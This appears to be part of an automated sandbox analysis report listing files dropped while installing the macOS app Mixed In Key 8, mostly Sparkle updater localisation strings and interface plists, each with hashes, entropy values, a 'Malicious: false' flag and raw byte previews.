Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .7.0.2.0.=.B.0.6.5.=.8.9. .V. .3.>.B.>.2.8.9. .4.>. .2.8.:.>.@.8.A.B.0.=.=.O.!. ...0.6.0.T.B.5. .2.A.B.0.=.>.2.8.B.8. .V. .?.5.@.5.7.0.2.0.=.B.0.6.8.B.8. .%.1.$.@.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. ."...V.4. .G.0.A. .@.>.1.>.B.8. .7. .%.1.$.@. .7. .B.>.<.C.,. .I.>. .?.@.8.7.=.0.G.5.=.8.9. .;.8.H.5. .4.;.O. .G.8.B.0.=.=.O.,. .=.0.?.@.8.:.;.0.4.,. .>.1.@.0.7.C. .4.8.A.:.0. .G.8. .>.?.B.8.G.=.>.3.>. .4.8.A.:.C.,. .9.>.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/zh_CN.lproj/.BC.T_TRyhd4 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3190
Entropy (8bit):	5.962955012702519
Encrypted:	false
SSDEEP:	96:PD67u3CiRps8tRnizzLas+IzLazLP/kEE6FNjq8RC0RZZf:bdp1tRizzLxzLazLHtJpTf
MD5:	09EC9B35B013F07C4086E2432DBCCE7F
SHA1:	0FDD932C1DD967D03E843AFBCB6EE72FF65467AB
SHA-256:	32DC66D14898CF2225877756CB29B110672FEAA18E31F3E3BB6E93434A9F1C4F
SHA-512:	E20E208EF35222F8FF59AD902A952807D6FF838CD6E234BC26C7E3B9BB90DFED0B1B62E50BD7D6C6092329BE8F6E12037C75944F908C7AC449DDD8438F742701
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @....................................% $1 @..?.;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$. ..................................................................% $1 @............................;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @.................."..;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @............................% $3.@...................."..;".@%d wolnaoed"d= " @%. ......;"..%" @fo% "@= " 1%@$/ % $2"@.;". Aen wevsroi nfo% @sia avlibael"!= " ........% @................;"..A"n wev reisnoo f@%i serda yoti snatll"!= " ........%

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/zh_TW.lproj/.BC.T_fp0h2f Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3096
Entropy (8bit):	5.999412604664841
Encrypted:	false
SSDEEP:	48:PFWDUhvOM9bpxT/nnRTj3iMxjLkG783sX83bUjSxB88fUkJGNicOqYGzemOPk:PHhDTvRTj3iCLB83ss3b2SbjsbNicEBM
MD5:	141F43A3CE5CB5DED83C83E0DA541F50
SHA1:	BC62DC9E9EFF199B40FC884B5CC0AF645EBC6753
SHA-256:	6C718D352F88367AA9AFDCD11FE60BC1D0BA89C405EF8F7509B22D8974546DF7
SHA-512:	E1C0FB4948F6DA3BC82EE4B49111339582689FD3DA778BE3623233CC9F83F90BF056954D36394B98BF745E45CF1FAC0BA7F8557A179FCFC4A085B54121EA02B7
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @............................................1%@$.."..;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =."..% $1 @.............................................................. .1%@$. .......................................................... ;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @....................;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$. ..........................% $3.@..................;"..%" @odnwoldade " =%" @......"..;".@%o f@% " =%"$1 @ /2%@$;"..A"n wev reisnoo f@%i svaiaallb!e " =."............ .@%. ..........;"..A"n wev reis

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/_CodeSignature/.BC.T_PbHFVL Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	17199
Entropy (8bit):	5.135736976134119
Encrypted:	false
SSDEEP:	96:CyJtdO+JgD63rQI0dJ5rUGUK37ef1XNfSZ/6HL9eVLUbZDP0DCi3VXvu6wK+YYks:XHvMDOitcnRTfgcUN9r8bAtseEDzko
MD5:	F2FB293FFB80AE5B11A177D3FC125BFC
SHA1:	5AEEC2C81C57F32F9587212DA45C44AC8D5CAFEB
SHA-256:	53EEB8124CEB6E7332FBE2486FD7B3DB7DD5E68635E7354FF50CE7680372017D
SHA-512:	563BA088F438CAE901C9A46B447A169697EFEB03C552AEEE1D2B47A0FCFB6A32C7B57E6A6D31FC5401273F43251B6DD497108DFDB9302D37CF38B65B4257058E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/SUStatus.nib</key>...<data>...sYsx+yJdk7U5jlaT5UjkYAO2vYY=...</data>...<key>Resources/Sparkle.icns</key>...<data>...RAPi1GDm7RjA+JlOSVD1eYK+1VA=...</data>...<key>Resources/ar.lproj/Sparkle.strings</key>...<dict>....<key>hash</key>....<data>....3lN5msMrnMK9Fubf02YF5yyKp7U=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/ca.lproj/Sparkle.strings</key>...<dict>....<key>hash</key>....<data>....6/s1eEjWZXuL2nONj/e+GBQpgwM=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/cs.lproj/Sparkle.strings</key>...<dict>....<key>hash</key>....<data>....7G6Wu81r8iXwJthLcpfOsWytHBY=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/cy.lproj/Sparkle.strings</key>...<dict>....<key>hash</key>....<data>....KN8ItOjhEffwLKA/MVfiNyq

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/.BC.T_Fyuz5i Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	7338
Entropy (8bit):	4.058797302856809
Encrypted:	false
SSDEEP:	96:M4Gt+I3jiH0tbnTvP5gzo/mgpnJ+ELloNmemvMMk/0/DZkstLM2hF:Mx3jiOCMuYnJ+zTmvkIKK427
MD5:	5B9906E0639B83DC409E4D9D16074085
SHA1:	74CDFC1DAFDC67083C4A5B3DC561D7834FA82AF4
SHA-256:	0713432356335E0445C90539D327AAD2D9F7C4BCF23194F92284CF5A0C2E34F8
SHA-512:	D1B93FEAE9A9AB5FB67228D0645B2D91018B7822362DD004519156248C7296224E6E8C42D3EE564AF18A472D906CBE1B7EE0F5528E59115EA10B00FEB8CE58CD
Malicious:	false
Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. ."..E. ..F.2.J.D. .%.1.$.@. .%.2.$.@. .H.G.H. .,.'.G.2. .D.D.'.3..../.'.E... .G.D. ..1.:.(. .(..+.(.J.. .'.D..-./.J.+. .H.%.9.'./.). ..4.:.J.D. .%.1.$.@. .'.D.".F...".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".D.'. .J.E.C.F. ..-./.J.+. .%.1.$.@. .%.0.'. .4.O.:.Q.D. .E.F. .H.-./.). ....2.J.F. .D.D.B.1.'.!.). .A.B.7. .C.5.H.1.). .B.1.5. .#.H. .B.'.1.&. .'.D.#.B.1.'.5. .'.D.6.H.&.J.)... .'.F.B.D. .%.1.$.@. .%.D.I. .E.,.D./. .'.D.*.7.(.J.B.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/.BC.T_HBiIrA Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	11231
Entropy (8bit):	6.727588278191743
Encrypted:	false
SSDEEP:	192:KS1WI1xpDOVE0lrjeEYNMtKwQN4V0VzZLqwtcKquKsEwty+lEPz:KSg2pDqE0ZeEYNg7QN4MdeecKqHs7Q5
MD5:	09A84F2E53586C216770298F304F3413
SHA1:	C3E4036BEE69C6A177782E7D898BD134C76D1C2A
SHA-256:	C1E345A144AA46FDEEB9713E98C642A24102E5ED9C183AFE40004B7C894C905A
SHA-512:	215E71D2E5E0407CD92D4608040EC0CC13E6D3F676B05BEBEC8FD1E3C0989F200130D9C0661E364C885A1AF2E7A64CAE46E96F988475D6358B2B1159BF4D88D1
Malicious:	false
Preview:	bplist00..............i.jX$versionX$objectsY$archiverT$top...............#.$.*...2.;.C.].e.h.l.x.y.z.{.\|.}.~.........................................................................&.'.0.1.5.6.;.<.A.F.G.I.K.L.Q.n.o.p.q.z.........................................................................5.m.....N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.`.c.fU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....q.o.l...........p.. ...!."[NSClassName...._..SUPasswordPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.:..4.5.6.7.8.9.....7.F.g.j....<.=.>.....@.A.BXNSSource]NSDestinationWNSLabel..........D.E.F.G.H.I.J.K...L.M.N.O.P.Q.R.S.T.U.P.T.X.Y.Z.[.YYNSEnabledWNSFrame_..NSAllowsLogicalLayoutDirectionVNSCell[NSSuperviewXNSvFlagsZNSEditable_..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/.BC.T_lZ55QE Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12199
Entropy (8bit):	6.756128403184578
Encrypted:	false
SSDEEP:	192:zK1WxXoQOJgjE0lTjeEYNMtKwC/4IMdjGs7sK5wNCZ/scXdKggoe:zKgxXoQUgjE0NeEYNg7C/4IMdjGWsfYy
MD5:	EBDBD654548AD0B72E7ED3F8424BF9BD
SHA1:	AE8E7CD6581FE71EF16F4C815FBE6789F6BF7ECB
SHA-256:	77FA6E398B746F9069B017CEB8ABD089927738949D70C477AE13D37F1CC12EA4
SHA-512:	1F76FF88F584961F597F2394DB60F9F4AE6025F653E0DBAA76641036AAD43958175B32291A82013807FD751F7A83104381437AC740569294DF83AA078B64F415
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/.BC.T_xURfYw Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18413
Entropy (8bit):	6.841024145237134
Encrypted:	false
SSDEEP:	384:kl3g4CE00eEYNg7wzsnk8AKQcsXyGTGWUU/ASI2jNuz2+H2V1ZN8N4:O3g4deEYykvKniGWZ/ASIkNDE2V1T1
MD5:	67FAA715745F035BED3EF9BE75BA55BB
SHA1:	C92E59C780926374E7B20E7AE8CE4092938A9656
SHA-256:	946E3A9B7B6D35F3F9DC5AE7F587533F0BA832F5612A4D9CB25D58AB8B8FF369
SHA-512:	2F251DDEC032DB13145F0AC0913208A55EFFD76A11FF197E1186901DBDE847191392B8C5D8C53C8DA524EDCD77C0B998BD52F5BF73814387A596B2370290774B
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$....2.D.L.`.i.j.z.{.......................................................................6.<.L.P.y.z...........................................................................$.%..,./.8.9.A.B.C.D.G.H.M.m.n.o.p.z.....................................................................................".(.).*.-.0.3.4.6.7.8.9.:.=.>.C.D.H.M.N.S.T.`.a.b.c.j.k.l.o.s.z...............................................w._.......................................".D.v.^...d............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObj

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/.BC.T_y9Kwb1 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15857
Entropy (8bit):	6.829276643295605
Encrypted:	false
SSDEEP:	384:dgxfE0NeEYNg7ns2OFvWJtjGDHOlrL1g1yrMi2Smxt22V:dgxveEYyDSvWJlGyrL4slmpV
MD5:	9B72FC2BE98D0F6C0B48D2D1BE7B5C9B
SHA1:	917F368339286761A6E08EEAE1C73FB26158AB3A
SHA-256:	4AFF2DEB1FFCF13E054AE3F058F8C0F140D353CA1ABC9FD0D224AB409AAD2432
SHA-512:	4F5CF726BDEB3C58E1388D4B101430B5D48D090B75F697FC7F27C16F156C4C722AC2EDEF8CBEF42CD14DC01EE0B61626767362D7F94D7F863640595AD1A0A7A8
Malicious:	false
Preview:	bplist00................ X$versionX$objectsY$archiverT$top................#.$....2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.........b.............................................................$..+.,./.2.5.>.?.G.K.L.U.V.^._.c.x.\|...........................................................................................................#.$.%.+.3.4.5.;.C.D.E.K.R.S.T.[.\.].w.z.{.}.....s.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..................... ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/.BC.T_P3xDO3 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15732
Entropy (8bit):	6.801968495801679
Encrypted:	false
SSDEEP:	384:k7g/pE0DeEYNg7uH4+dpC6JthGq+y0Hz6h/m4AckyrY2rJ:k7g/DeEYyupC6JzG226M4fNrJ
MD5:	5F0F63BDCF210C55B03D4706E1E6EC04
SHA1:	8EE78B8AB2E1DE35E960880C4A9A2C03067F5ED8
SHA-256:	4CA69BA1F9023769B898A96DFE800D2DE1F83B7074502F4E41FC83B06C596A2A
SHA-512:	465D72F07142E2A95BB577AECF5B244D4660D93E7EAFA3BC5CEF8ED4E0C7B1AD5B6820DD23A441C72E9DD3FB7A30FB2E18C1ABF9D1968AA9BE3EE202D92461D9
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.E.M.a.j.k.{.\|.....................................................................+.2.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U...V.W.].j.k.l.m.`.o.s.w.z.{...................................................................".-.0.1.9.:.;.G.J.K.S.T.U.j.n.r.s.u.v.w.}.......................................................................................................$.%.&.,.4.5.6.<.C.D.E.L.M.N.h.k.l.n.....e._..................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..................... ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.D....4.5.6.7.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/.BC.T_aeHVmh Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18531
Entropy (8bit):	6.795186436798338
Encrypted:	false
SSDEEP:	384:ZgZpE0DeEYNg7uH4+53NAKAswd171TSO71lflbP8YU/8oWuSgBQRtW5E:ZgZDeEYyZKAJRblfZ4/8oBBWtqE
MD5:	6B5D21F527D33BB47C4F6EAAA8171AD1
SHA1:	ADE56798A94093D2BE1DB77A7A86A1CE13F1B345
SHA-256:	569973B6720FB0681129281168BB8FEFA2027A61D16AAB80C033157D888E5863
SHA-512:	A2D949A31CB11BAA99BE9CF215E5B8E31A7CE98DE8F9558A9FE616B96D4487F08C5BB36B61B3B282AE025E323B7EBC48E9C2F0037635E0E6AC661596ADAA1CFF
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/.BC.T_fhWlks Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	6692
Entropy (8bit):	3.5708187390906523
Encrypted:	false
SSDEEP:	96:M42umt+Jo3tir6PR5PKJ1yWrwFmIk2GnjkjgYC66xmvAHkXGMdXxqC:MWo3tmVTtncgYUj2hN
MD5:	CA263DA5A183E7C3CDE5B4AD2EDDC60B
SHA1:	1655DEB4BC11D23E7FD68766D036FE1F609CB538
SHA-256:	6097D225090B8C7AFE5108437629B983EDD2B0CA56BB80B90927724DCDDBFE4D
SHA-512:	83941EABBD609F250A2FF3FA31F0E428EBC4D83697DDBD54C159338E5AFA509287A6654DD631A396944FFCDCB5F9FFDDC91877A40756DCFBF59B86A7687C9659
Malicious:	false
Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .b.y.l. .i.n.s.t.a.l.o.v...n. .a...j.e. .p.Y.i.p.r.a.v.e.n. .k...p.o.u.~.i.t... .p.o. .p.Y...a.t...m. .s.p.u.a.t...n..... .P.Y.e.j.e.t.e. .s.i. .a.p.l.i.k.a.c.i. .%.1.$.@. .n.y.n... .n.a.i.n.s.t.a.l.o.v.a.t. .a...z.n.o.v.u. .s.p.u.s.t.i.t.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".A.p.l.i.k.a.c.e. .%.1.$.@. .n.e.m.o.~.e. .b...t. .a.k.t.u.a.l.i.z.o.v...n.a.,. .p.r.o.t.o.~.e. .j.e. .s.p.u.a.t...n.a. .z. .n.e.z.a.p.i.s.o.v.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/.BC.T_lWlP45 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12192
Entropy (8bit):	6.719748502159661
Encrypted:	false
SSDEEP:	192:zK1WxXDQOLyjE0lTjeEYNMtKwC/4I1G4+s7sK5wNCZ/scX/cAQZPJHBeSR4:zKgxXDQwyjE0NeEYNg7C/4I1G4+WsfYh
MD5:	7B75B6D9C1CCCBF63981460B9AF6CD66
SHA1:	BEB423531C61DC3A92F37CDFE790A7C9779B6435
SHA-256:	D3563E0CD0B1ED4A1D3122B4BA8D5D5E067D4316FAB7BA410C7352B3202AB9A9
SHA-512:	5C15BD8880D882D12A80A51A779DC1BAD34126C6F5FAFADCDCC13344680DD79369245F63737A0E96C8925006530455485013B95376E42626778360998D27152C
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/.BC.T_8QFldP Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12099
Entropy (8bit):	6.7409499727549615
Encrypted:	false
SSDEEP:	192:zK1WxXoQOLgjE0lTjeEYNMtKwC/4IraE4Cs7sK5wNCZ/scX/cAQZP0gX:zKgxXoQwgjE0NeEYNg7C/4IraEHWsfYS
MD5:	B424A518FA33A5825EA21FAE09D125E3
SHA1:	F777CF80A84567E768A35049672C7ED5EB88E575
SHA-256:	BAE4445AC8ED836D457C8154C971EF4A33A450305C72D359BE9E63997EBDF09B
